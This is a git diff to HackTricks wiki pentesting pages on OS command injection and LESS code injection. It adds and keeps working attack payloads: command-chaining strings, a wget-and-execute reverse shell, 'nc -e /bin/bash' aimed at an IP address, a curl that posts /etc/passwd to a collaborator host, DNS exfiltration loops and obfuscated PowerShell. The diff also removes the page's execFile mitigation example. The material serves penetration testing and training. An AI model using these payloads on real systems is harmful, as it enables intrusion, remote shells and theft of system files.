HackTricks-wiki · carlospolop · Nov 3, 2025
diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md
@@ -12,6 +12,9 @@ Depending on **where your input is being injected** you may need to **terminate
 
 ## Command Injection/Execution
 
+<details>
+<summary>Common command chaining payloads</summary>
+
 ```bash
 #Both Unix and Windows supported
 ls||id; ls ||id; ls|| id; ls || id # Execute both
@@ -32,27 +35,49 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful
 < /etc/passwd #Try to send some input to the command
 ```
 
-### **Limition** Bypasses
-
-If you are trying to execute **arbitrary commands inside a linux machine** you will be interested to read about this **Bypasses:**
-
-
-{{#ref}}
-../linux-hardening/bypass-bash-restrictions/
-{{#endref}}
+</details>
 
 ### **Examples**
 
-```
+```bash
 vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
 vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
 vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
 ```
 
+### Terminate and comment out trailing shell tokens (avoid exporter pipelines)
+
+Many real systems build a shell pipeline around your input (e.g., `mktemp`, `chmod`, `tar`, `du -s`, etc.). If you only inject a command separator like `; <cmd>`, the shell will continue parsing the exporter’s trailing tokens, often breaking your payload with syntax/path errors.
+
+Technique:
+- Use `;` to end your injected command.
+- Immediately add `#` to comment out everything that the application appends after your input on that same line (POSIX shells treat `#` as comment-until-newline).
+
+Generic shape when the parameter is embedded unquoted in a shell:
+
+```json
+{
+  "dir": "/tmp/x-; curl -s --data-binary @/etc/passwd http://<collaborator>/; #"
+}
+```
+
+Notes:
+- This works when your data is evaluated by a shell and not kept inside quotes. If the input is quoted, first break out of the quotes with `'` or `"` as needed, then apply `; ... ; #`.
+- If the app appends tokens on a new line, comment until newline may not cover them; in such cases, inject a newline first and then a `#` line.
+
+Quick blind RCE confirmation (HTTP OOB):
+
+```bash
+curl -s --data-binary @/etc/passwd http://<collaborator>/
+```
+
 ### Parameters
 
 Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities (from [link](https://twitter.com/trbughunters/status/1283133356922884096)):
 
+<details>
+<summary>Common parameter names to test</summary>
+
 ```
 ?cmd={payload}
 ?exec={payload}
@@ -81,11 +106,13 @@ Here are the top 25 parameters that could be vulnerable to code injection and si
 ?print={payload}
 ```
 
+</details>
+
 ### Time based data exfiltration
 
 Extracting data: char by char
 
-```
+```bash
 swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
 real    0m5.007s
 user    0m0.000s
@@ -101,13 +128,13 @@ sys 0m0.000s
 
 Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca
 
-```
+```bash
 1. Go to http://dnsbin.zhack.ca/
 2. Execute a simple 'ls'
 for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
 ```
 
-```
+```bash
 $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
 ```
 
@@ -120,7 +147,7 @@ Online tools to check for DNS based data exfiltration:
 
 #### Windows
 
-```
+```powershell
 powershell C:**2\n??e*d.*? # notepad
 @^p^o^w^e^r^shell c:**32\c*?c.e?e # calc
 ```
@@ -146,16 +173,6 @@ exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(pay
 
 `exec()` spawns a **shell** (`/bin/sh -c`), therefore any character that has a special meaning to the shell (back-ticks, `;`, `&&`, `|`, `$()`, …) will result in **command injection** when user input is concatenated in the string.
 
-**Mitigation:**  use `execFile()` (or `spawn()` without the `shell` option) and provide **each argument as a separate array element** so no shell is involved:
-
-```javascript
-const { execFile } = require('child_process');
-execFile('/usr/bin/do-something', [
-  '--id_user', id_user,
-  '--payload', JSON.stringify(payload)
-]);
-```
-
 Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024).
 
 ### Argument/Option injection via leading hyphen (argv, no shell metacharacters)
@@ -178,7 +195,7 @@ What to try:
 
 Generic PoC shapes against centralized CGI dispatchers:
 
-```
+```http
 POST /cgi-bin/cstecgi.cgi HTTP/1.1
 Content-Type: application/x-www-form-urlencoded
 
@@ -199,12 +216,12 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 
 ## References
 
-- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
 - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
 - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
 - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
 - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
 - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
+- [CVE-2025-52665: Unauthenticated RCE in UniFi Access backup/export via dir command injection](https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000)
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md
@@ -1,4 +1,6 @@
-## LESS Code Injection leading to SSRF & Local File Read
+# LESS Code Injection leading to SSRF & Local File Read
+
+{{#include ../../../banners/hacktricks-training.md}}
 
 LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive.  During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.
 
@@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
 
 * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
 * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
-* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
+* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
+{{#include ../../../banners/hacktricks-training.md}}